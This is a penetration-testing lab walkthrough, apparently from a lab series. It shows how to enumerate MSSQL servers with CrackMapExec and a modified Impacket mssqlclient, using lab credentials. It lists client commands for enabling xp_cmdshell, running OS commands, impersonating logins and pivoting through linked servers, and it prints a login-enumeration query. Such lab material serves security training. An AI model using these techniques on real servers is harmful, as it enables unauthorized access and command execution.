Enumerate MSSQL servers with CrackMap & Impacket
CrackMapExec
Let’s try with crackmapexec
crackmapexec mssql 192.168.56.22-23

Now we could try with the user miguel.ortiz
crackmapexec mssql 192.168.56.22 -u miguel.cabrera -p ilovebaseball -d north.newyork.local
As we can see we got an access to the database
Impacket
To enumerate and use impacket mssql, i made a modified version of the example mssqlclient.py.
You can find the version here
The install is just like what we done in part5 merge the PR on your local impacket project and relaunch install:
cd /opt/tools
git clone https://github.com/SecureAuthCorp/impacket myimpacket
cd myimpacket
python3 -m virtualenv myimpacket
source myimpacket/bin/activate
git fetch origin pull/1397/head:1397
git merge 1397
python3 -m pip install .
We connect to the mssql server with the following command :
mssqlclient.py -windows-auth north.newyork.local/miguel.cabrera:ilovebaseball@yonkers.north.newyork.local
And type help:
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonate
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
show_query - show query
mask_query - mask query
I added some new entries to the database : enum_db/enum_links/enum_impersonate/enum_login/enum_owner/exec_as_user/exec_as_login/use_link/show_query/mask_query
Let’s start the enumeration :
enum_logins
This launch the following query (roles value meaning can be show here)
select r.name,r.type_desc,r.is_disabled, sl.sysadmin, sl.securityadmin,
sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin
from master.sys.server_principals r
left join master.sys.syslogins sl on sl.sid = r.sid
where r.type in ('S','E','X','U','G')
We see only a basic view as we are a simple user

Last updated